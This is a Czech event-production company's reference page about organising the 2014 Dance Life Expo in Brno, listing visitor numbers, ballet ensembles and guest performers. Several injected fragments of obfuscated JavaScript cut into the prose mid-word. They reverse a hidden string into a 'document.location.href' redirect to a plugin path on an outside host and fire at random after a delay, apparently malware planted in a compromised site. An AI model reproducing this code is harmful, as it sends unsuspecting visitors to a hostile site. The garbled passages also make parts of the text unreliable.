Reference – Dance life expo 2014

Letošní, již 3. ročník úspěšného veletrhu Dance Life EXPO na brněnském výstavišti, přilákal více než 42 000 návštěvníků a opět prověřil naše produkční, technické, organizační a do jisté míry i improvizační schopnosti.

Již tradičně jsme zajišťovali komplexně produkci několika stěžejních pilířů veletrhu a prestižní Theatre stage, na které se vystřídalo za 3 dny 19 souborů celkem s 23 představeními. Nejvýraznějším bylo pak Gala představení baletních souborů, které přineslo skutečně neobyčejný zážitek, který vrcholil několikaminutovým potleskem.
Naše idea představit na jednom pódiu nejvýznamnější taneční soubory a jejich tvorbu, se setkala s velkým úspěchem.

Posuďte sami: Národní Divadlo Praha, Národní Divadlo Brno, Divadlo F. X. Šaldy Liberec, Divadlo J. K. Tyla v Plzni, Moravské Divadlo Olomouc a Pražský komorní balet v jednom sále opravdu často neuvidíte.

Ani na ostatních stage jsme nezaháleli, celkem jsme pro DLE 2014 zajistili:

  • přes 350 umělců
  • zorganizovali 29 workshopů
  • a předvedli přes 70 uměleckých vystoupení

včetně dech beroucí šálové akrobacie, ohňové a světelné show, pozemní akrobacie, salsy, stdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andardních i latinsko-amerických tanců a v neposlední řadě i  ukázky baletu.

Dovezli jsme několik zahraničních i českých hvězd – např.  Ferndom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando Dominguez (rozhovor dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anda-domingueze-jednu-z-hvezd-letosniho-dance-life-expo-2014/“>ZDE),  Oliver Mahar, Lamine Diatta, Mário Radačovský, Qaša, atd

Referencemi jsou pak články a vyjádření zúčastněných a také fakt, že celý veletrh zanechal dobrý pocit u návštěvníků, partnerů i účinkujících.

Myslíte si, že váš plánovaný veletrh, ples nebo jiná firemní akce dosahuje podobného rozsahu a komplexity? Potřebujete někoho, na koho se můžete spolehnout? Jsme připraveni vyslechnout Vaše představy, zadání a proměnit Vaše sny ve skutečnost.

Recenze o akci zde:

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}Dance Life Expo 2014 úspěšně vrcholí

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}Cílová rovinka letošního Dance Life Expo

TOP